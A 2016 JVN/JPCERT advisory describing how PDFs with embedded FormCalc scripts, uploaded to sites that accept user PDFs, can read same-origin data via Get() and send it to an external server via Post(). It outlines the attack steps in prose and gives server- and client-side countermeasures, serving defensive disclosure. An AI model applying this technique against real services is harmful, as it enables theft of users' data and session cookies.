Published:2016/11/18  Last Updated:2016/11/18

JVNTA#94087669
Using specially crafted PDF files to steal information

Overview

By embedding a script written in FormCalc in a PDF document allows  a user to obtain arbitrary contents within the same origin where the original PDF is being hosted. When this behavior is exploited by an attacker in a web application or service that allows users to upload arbitrary PDF files, sensitive information on the server may be stolen.

Products Affected

This issue exists under the following server / client combination:

Server: Allows users to upload PDF documents. The uploaded PDF files are stored in the same origin.
Client: Environment where Adobe PDF Plugin is enabled in IE11 or Firefox

Description

PDF allows the creation of documents with entry forms. As a specification to enable this, in PDF 1.5 and later, Adobe XML Form Architecture (XFA) formulated by Adobe is supported. In addition, in order to dynamically process caluclations on values entered in a form, a script language called FormCalc is available. Using this enables a user to embed a program within a PDF document.

For more information on FormCalc, including specifications, refer to the FormCalc User Reference provided by Adobe.

FormCalc provides a group of functions called URL functions in addition to functions for various kinds of arithmetic. They include functions such as Get(), Post() and Put(). These functions can be used to obtain contents for a URL by specifying the URL as a parameter or posting contents to a specific URL by passing data as a parameter. In other words, an embedded program in a PDF can download contents from the same origin or post contents to a different origin.

This behavior is part of the specification of Adobe XFA. An attacker exploiting this behavior may perform attacks mentioned in "PDF- Mess with the web".

(1)  (Attacker) Upload a FormCalc script embedded PDF document to the target server. Here, the script is desinged to obtain sensitive data within the same origin using Get()
(1)' (Attacker) Trick a user into clicking the link for this PDF document
(2)  (Victim) The PDF document is loaded in the web browser
(2)' (Victim) FormCalc sends the Get() request in the context of the Victim and obtains sensitive data. Post() is used to send this data to an external server

Since the web browser sends the request in (2)', the request may contain a session cookie.

Adobe has addressed similar threat where the Same Origin Policy may be bypassed (CVE-2014-8453). However they have determined that this behavior within the same origin is expected. Web applications and users must account for this behavior.

Lastly, attack methods are also mentioned in PoC||GTFO 0x12 and PDF Special Function (FormCalc).

Impact

Effects similar to Stored XSS or CSRF may occur.

In other words, sensitive contents on the server may be obtained by an attacker, an attacker may send a malformed request to obtain account information or change system settings.

Solution

User-side countermeasures
Disable the Adobe PDF plugin in the web browser (IE11, Firefox)

Server-side countermeasures
Store PDF documents in a separate sandboxed domain.

Note that if the PDF is embedded in the web content by the attacker, even if the Content-Disposition: attachment is added to the HTTP response header, the header will be ignored, so this will not act as a countermeasure.

Vendor Status

Vendor Status Last Update Vendor Notes
BizMobile Inc. Vulnerable, investigating 2016/11/18
Cybozu, Inc. Vulnerable 2016/11/18 Cybozu, Inc. website

References

  1. Adobe
    FormCalc User Reference
  2. OWASP AppSecEU 15
    PDF - Mess with the web
  3. International Journal of Proof-of-Concept or Get The Fuck Out (PoC||GTFO or PoC or GTFO)
    PoC||GTFO 0x12
  4. Hack Patch!
    PDF Special Function (FormCalc)

JPCERT/CC Addendum

Vulnerability Analysis by JPCERT/CC

Credit

Other Information

JPCERT Alert
JPCERT Reports
CERT Advisory
CPNI Advisory
TRnotes
CVE
JVN iPedia